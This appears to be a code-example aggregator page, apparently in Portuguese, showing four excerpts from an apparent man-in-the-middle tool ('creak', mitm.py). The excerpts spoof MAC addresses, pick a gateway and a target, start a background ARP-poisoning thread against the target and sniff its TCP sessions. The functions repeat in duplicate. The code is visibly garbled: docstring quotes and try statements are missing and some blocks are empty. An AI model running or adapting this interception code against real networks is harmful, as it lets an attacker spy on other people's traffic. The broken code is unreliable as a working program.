Exemplo n.º 1
def get_mitm(parsed_args):
    create an object of type Mitm based on arguments received
    args = parsed_args

    if not args.dev:
        sys.exit(sys.argv[0] + ' -h for help\n[!] Must specify interface')

    dev = "%s" % "','".join(args.dev)

    original_mac_addr = utils.get_mac_by_dev(dev)
    mac_addr, changed = original_mac_addr, False

    if not args.source:
            args.source = utils.get_default_gateway_linux()
        except OSError:
            args.source = raw_input('[!] Unable to retrieve default gateway, please specify one: ')
            if not utils.is_ipv4(args.source):
                exit('[!] Unable to retrieve default gateway, please specify one using -s option')

    if not args.target:
        args.target = raw_input('[?] No target address specified, please insert one: ')
        if not utils.is_ipv4(args.target):
            exit('[!] Must specify at least one target address')
        if len(args.target) == 1:
            args.target = ''.join(args.target)

    conf = ConfigParser.ConfigParser()
    verbose = conf.getboolean('output', 'VERBOSE')
    debug = conf.getboolean('output', 'DEBUG')

    if args.verbosity:
        verbose = True
    if args.debug:
        debug = True

    if args.spoof is True:
        choice = raw_input('[+] In order to change MAC address ' + G + dev + W
                           + ' must be temporary put down. Proceed?[y/n] ')
        if choice == 'y':
            if not args.macaddr and not args.manufacturer:
                mac_addr = utils.fake_mac_address([], 1)
            elif args.macaddr and not args.manufacturer:
                if utils.parse_mac(args.macaddr) != utils.parse_mac(original_mac_addr):
                    mac_addr = utils.fake_mac_address(utils.mac_to_hex(args.macaddr))
            elif args.manufacturer:
                macs = utils.get_manufacturer(args.manufacturer)
                mac_addr = utils.fake_mac_address(utils.mac_to_hex(random.choice(macs)))

                utils.change_mac(dev, mac_addr)
                changed = True
            except OSError:

        print("[+] Waiting for wireless reactivation..")

        if args.mode == 1 or args.mode == 2:

    # no spoof but set mac address anyway
    elif args.macaddr:
        mac_addr = args.macaddr

    print("[+] Using " + G + mac_addr + W + " MAC address\n"
          "[+] Set " + G + args.source + W + " as default gateway")

    if conf.get('output', 'ENGINE').lower() == 'scapy':
        return (args, changed, original_mac_addr,
                cmitm.ScapyMitm(dev, utils.parse_mac(mac_addr), args.source,
                                args.target, debug, verbose))
    return (args, changed, original_mac_addr,
            cmitm.PcapMitm(dev, utils.parse_mac(mac_addr), args.source,
                           args.target, debug, verbose))
Exemplo n.º 2
def get_mitm(parsed_args):
    create an object of type Mitm based on arguments received
    args = parsed_args

    if not args.dev:
        sys.exit(sys.argv[0] + ' -h for help\n[!] Must specify interface')

    dev = "%s" % "','".join(args.dev)

    original_mac_addr = utils.get_mac_by_dev(dev)
    mac_addr, changed = original_mac_addr, False

    if not args.source:
            args.source = utils.get_default_gateway_linux()
        except OSError:
            args.source = raw_input('[!] Unable to retrieve default gateway, please specify one: ')
            if not utils.is_ipv4(args.source):
                exit('[!] Unable to retrieve default gateway, please specify one using -s option')

    if not args.target:
        args.target = raw_input('[?] No target address specified, please insert one: ')
        if not utils.is_ipv4(args.target):
            exit('[!] Must specify at least one target address')
        if len(args.target) == 1:
            args.target = ''.join(args.target)

    conf = ConfigParser.ConfigParser()
    verbose = conf.getboolean('output', 'VERBOSE')
    debug = conf.getboolean('output', 'DEBUG')

    if args.verbosity:
        verbose = True
    if args.debug:
        debug = True

    if args.spoof is True:
        choice = raw_input('[+] In order to change MAC address ' + G + dev + W
                           + ' must be temporary put down. Proceed?[y/n] ')
        if choice == 'y':
            if not args.macaddr and not args.manufacturer:
                mac_addr = utils.fake_mac_address([], 1)
            elif args.macaddr and not args.manufacturer:
                if utils.parse_mac(args.macaddr) != utils.parse_mac(original_mac_addr):
                    mac_addr = utils.fake_mac_address(utils.mac_to_hex(args.macaddr))
            elif args.manufacturer:
                macs = utils.get_manufacturer(args.manufacturer)
                mac_addr = utils.fake_mac_address(utils.mac_to_hex(random.choice(macs)))

                utils.change_mac(dev, mac_addr)
                changed = True
            except OSError:

        print("[+] Waiting for wireless reactivation..")

        if args.mode == 1 or args.mode == 2:

    # no spoof but set mac address anyway
    elif args.macaddr:
        mac_addr = args.macaddr

    print("[+] Using " + G + mac_addr + W + " MAC address\n"
          "[+] Set " + G + args.source + W + " as default gateway")

    if conf.get('output', 'ENGINE').lower() == 'scapy':
        return (args, changed, original_mac_addr,
                cmitm.ScapyMitm(dev, utils.parse_mac(mac_addr), args.source,
                                args.target, debug, verbose))
    return (args, changed, original_mac_addr,
            cmitm.PcapMitm(dev, utils.parse_mac(mac_addr), args.source,
                           args.target, debug, verbose))
Exemplo n.º 3
    def list_sessions(self, stop, target_b=None, port=None):
        Try to get all TCP sessions of the target
        notorious_services = {
            20: ' ftp-data session',
            21: ' ftp-data session',
            22: ' ssh session',
            23: ' telnet session',
            25: ' SMTP session',
            80: ' HTTP session',
            110: ' POP3 session',
            143: ' IMAP session',
            194: ' IRC session',
            220: ' IMAPv3 session',
            443: ' SSL session',
            445: ' SAMBA session',
            989: ' FTPS session',
            990: ' FTPS session',
            992: ' telnet SSL session',
            993: ' IMAP SSL session',
            994: ' IRC SSL session'

        source = utils.get_default_gateway_linux()
        if target_b and target_b != self.gateway:
            source = utils.get_mac_by_ip(target_b)
        pcap_filter = self._build_pcap_filter("ip host ", port)
        packets = pcap.pcap(self.dev)
        packets.setfilter(pcap_filter)  # we need only self.target packets
        # need to create a daemon that continually poison our target
        poison_thread = Thread(target=self.poison, args=(
        poison_thread.daemon = True
        print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G +
              source + W + ' and ' + R + (','.join(self.target) if isinstance(
                  self.target, list) else self.target) + W + '\n')
        sessions = {}
            for _, pkt in packets:
                if stop():
                eth = dpkt.ethernet.Ethernet(pkt)
                ip_packet = eth.data
                if ip_packet.p == dpkt.ip.IP_PROTO_TCP:
                    tcp = ip_packet.data
                    if tcp.flags != dpkt.tcp.TH_RST:
                        sess = "%-25s <-> %25s" % (
                            inet_ntoa(ip_packet.src) + ":" + str(tcp.sport),
                            inet_ntoa(ip_packet.dst) + ":" + str(tcp.dport))
                        check = False
                        if sess not in sessions:
                            check = True

                        sessions[sess] = "Others"

                        if tcp.sport in notorious_services:
                            sessions[sess] = notorious_services[tcp.sport]
                        elif tcp.dport in notorious_services:
                            sessions[sess] = notorious_services[tcp.dport]

                        if check is True:
                            print(" [{:^5}] {} : {}".format(
                                len(sessions), sess, sessions[sess]))

        except KeyboardInterrupt:
            print('[+] Session scan interrupted\n\r')
Exemplo n.º 4
Arquivo: mitm.py Projeto: codepr/creak
    def list_sessions(self, stop, target_b=None, port=None):
        Try to get all TCP sessions of the target
        notorious_services = {
            20: ' ftp-data session',
            21: ' ftp-data session',
            22: ' ssh session',
            23: ' telnet session',
            25: ' SMTP session',
            80: ' HTTP session',
            110: ' POP3 session',
            143: ' IMAP session',
            194: ' IRC session',
            220: ' IMAPv3 session',
            443: ' SSL session',
            445: ' SAMBA session',
            989: ' FTPS session',
            990: ' FTPS session',
            992: ' telnet SSL session',
            993: ' IMAP SSL session',
            994: ' IRC SSL session'

        source = utils.get_default_gateway_linux()
        if target_b and target_b != self.gateway:
            source = utils.get_mac_by_ip(target_b)
        pcap_filter = self._build_pcap_filter("ip host ", port)
        packets = pcap.pcap(self.dev)
        packets.setfilter(pcap_filter) # we need only self.target packets
        # need to create a daemon that continually poison our target
        poison_thread = Thread(target=self.poison, args=(2, target_b, ))
        poison_thread.daemon = True
        print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G + source + W
              + ' and ' + R
              + (','.join(self.target) if isinstance(self.target, list) else self.target) + W +'\n')
        sessions = {}
            for _, pkt in packets:
                if stop():
                eth = dpkt.ethernet.Ethernet(pkt)
                ip_packet = eth.data
                if ip_packet.p == dpkt.ip.IP_PROTO_TCP:
                    tcp = ip_packet.data
                    if tcp.flags != dpkt.tcp.TH_RST:
                        sess = "%-25s <-> %25s" % (inet_ntoa(ip_packet.src) + ":"
                                                   + str(tcp.sport), inet_ntoa(ip_packet.dst) + ":"
                                                   + str(tcp.dport))
                        check = False
                        if sess not in sessions:
                            check = True

                        sessions[sess] = "Others"

                        if tcp.sport in notorious_services:
                            sessions[sess] = notorious_services[tcp.sport]
                        elif tcp.dport in notorious_services:
                            sessions[sess] = notorious_services[tcp.dport]

                        if check is True:
                            print(" [{:^5}] {} : {}".format(len(sessions), sess, sessions[sess]))

        except KeyboardInterrupt:
            print('[+] Session scan interrupted\n\r')